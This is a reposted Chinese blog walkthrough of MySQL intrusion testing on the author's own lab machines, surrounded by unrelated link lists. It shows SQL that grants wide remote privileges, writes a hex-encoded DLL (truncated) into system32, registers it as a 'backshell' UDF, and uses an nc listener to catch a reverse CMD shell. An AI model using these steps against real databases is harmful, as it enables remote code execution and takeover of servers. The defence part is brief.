当前位置: 首页 > news >正文

中国建设报社门户网站/站长工具seo综合查询烟雨楼

中国建设报社门户网站,站长工具seo综合查询烟雨楼,亿唐为什么2005年做虚拟网站,免费人物素材网站在做了之前的SQL SERVER之后,便很想尝试一下MYSQL的入侵测试已经防范,与大家一起分享。 总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的&am…

在做了之前的SQL SERVER之后,便很想尝试一下MYSQL的入侵测试已经防范,与大家一起分享。

总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。

正题之一

物理机:Win7

虚拟机:XP

给予mysql远程权限:

1 grant all privileges on *.* to 数据库账号@给予权限的IP identified by '数据库密码';
2 
3 flush privileges;

 

给物理机远程权限:

物理机成功连接上:

执行侵入测试前(有图有真相):

执行侵入测试后(有图有真相):

重启前(有图有真相):

重启后(有图有真相):

正题之二:

远程登录之后写入代码,代码在yyd.txt当中,然后在MySql中写入文件:

Win7 打另外一个cmd,本地端口映射:nc -vv -l -p 端口号

虚拟机上:执行映射:select backshell("物理机IP",端口号);

这便执行了3306端口反弹CMD

(没图了。。。用到了一个nc软件执行的映射)

 

yyd.txt大概内容:

复制代码
et @a=concat('',
0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部分代码...............0736875745f6465696e697400736875745f696e697400);
create table yyd(data LONGBLOB);
insert into yyd values("");updateyyd set data = @a;
select data from yyd into DUMPFILE 'c:\\windows\\system32\\yyd.dll';
CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll';
复制代码

 

 

正题之三:

防范

 

感觉有点乱,主要是分享了两种方法入侵,但是防范那部分应该是XP上的MySql服务关闭,但是早XP上做了好多测试,左后XP被我弄挂掉了。。。。好丢脸,只好把Win7上的MySql服务拿出来了。

觉得主要还是远程连接的问题,“如果MySql不开启远程连接的话我们还是朋友”,开玩笑,如果MySql不开启远程连接的话入侵几率会小的很多。

 




本文转自我爱物联网博客园博客,原文链接:http://www.cnblogs.com/yydcdut/p/3464215.html,如需转载请自行联系原作者

http://www.lbrq.cn/news/1391743.html

相关文章:

  • 怎样查找网站域名/企业网站推广方案的策划
  • 游戏代理是做什么的/seo企业站收录
  • 泰国网站域名/百度app客服人工在线咨询
  • 党校网站建设整改情况/如何设计企业网站
  • 企业如何建设免费网站/下载百度官方版
  • 做网站的学校有哪些/新网域名注册查询
  • 怎么做网站背景图/百度爱采购官方网站
  • dw如何做网站后台/安卓aso优化
  • 如何做网站的内链优化/怎么成为百度推广代理商
  • 什么是个人网站/灰色词秒收录代发
  • 网站建设的目标是/备案域名
  • seo网站的锚文本怎么写/苏州网站建设公司
  • 百seo排名优化/谷歌seo网站优化
  • 湖南3合1网站建设价格/雅虎搜索引擎中文版
  • 值得买 wordpress/seo对网络推广的作用是什么?
  • 宜昌平台网站建设/如何快速搭建一个网站
  • 政府门户网站建设的重点/网站网上推广
  • 今日国际新闻最新新闻/搜索引擎优化排名品牌
  • 小企业财务软件免费版/如何优化网络连接
  • BC网站开发公司/跨境电商seo
  • 用ps怎么做网站/必应搜索引擎首页
  • 路由器电脑可以做网站主机/产品网络推广深圳
  • 宜昌网站推广/湛江seo
  • 上海网站建设sheji021/营销型网站的类型有哪些
  • 做衬衣的网站/重庆百度小额贷款有限公司
  • 山西免费网站建设/纯手工seo公司
  • wordpress avada多少钱/刷神马seo排名首页排名
  • 网站建设 三乐/app推广注册放单平台
  • wordpress 二维码 插件/郑州网站优化哪家好
  • 怎么创建一个视频网站/外链群发平台
  • 【ElasticSearch】使用docker compose,通过编写yml安装es8.15和kibana可视化界面操作,go连接es
  • 微服务的编程测评系统13-我的竞赛列表-elasticSearch
  • 【51单片机学习】AT24C02(I2C)、DS18B20(单总线)、LCD1602(液晶显示屏)
  • leetcode-python-349两个数组的交集
  • 【免费AI文档助手开发实战系列】基于正则表达式的PDF脱敏python服务构建(一)
  • 23种设计模式——模板方法模式(Template Method Pattern)详解